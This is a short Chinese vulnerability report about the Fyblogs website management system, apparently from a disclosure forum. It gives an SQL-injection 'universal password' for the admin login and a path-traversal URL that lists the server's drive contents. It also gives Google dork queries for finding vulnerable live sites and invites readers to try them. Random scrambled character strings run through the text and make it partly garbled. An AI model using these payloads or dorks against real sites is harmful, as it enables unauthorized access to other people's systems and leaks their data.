漏洞类型: 未授权访问/权限绕过6 A1 [+ {! w6 O) o) k5 Y
! `8 O' ^) g9 D6 I简要描述:8 z- A7 O0 B' X) {0 o4 c7 X
) j' h% a$ ]2 D, U4 c, T. q# W
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!% T# E. F6 b! J ~
$ q/ o1 r( k3 Z+ ] z- x7 k
详细说明:
, f2 J9 ~+ n* Y' t4 p( z8 K" @7 L( f4 S+ m
后台万能密码 'or'='or'
# F+ }; U, L5 _! E# c: s8 Y' a, ?后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!. y. \# |: W; b' H
admin/uploadfile.asp?currentFolder=/upfiles/../
2 i+ v9 q/ ]" J, ?3 s$ n
( w8 ?" L% e! {6 |4 \7 Z" M漏洞证明:% f/ i* J/ L2 y! b: S& t( \
. U2 G: A* _! Y谷歌:inurl:type.asp?id=1 新闻中心
/ |! L C0 U9 W或者 :inurl:download_ok.asp?
7 N, [% ?4 i, z( }- X r; Y" j' _* N: h
可以测试9 B* V3 e' G* b/ |; C
$ o9 @& r g' ~- f# _# p9 }' Q$ m, z( p) a
|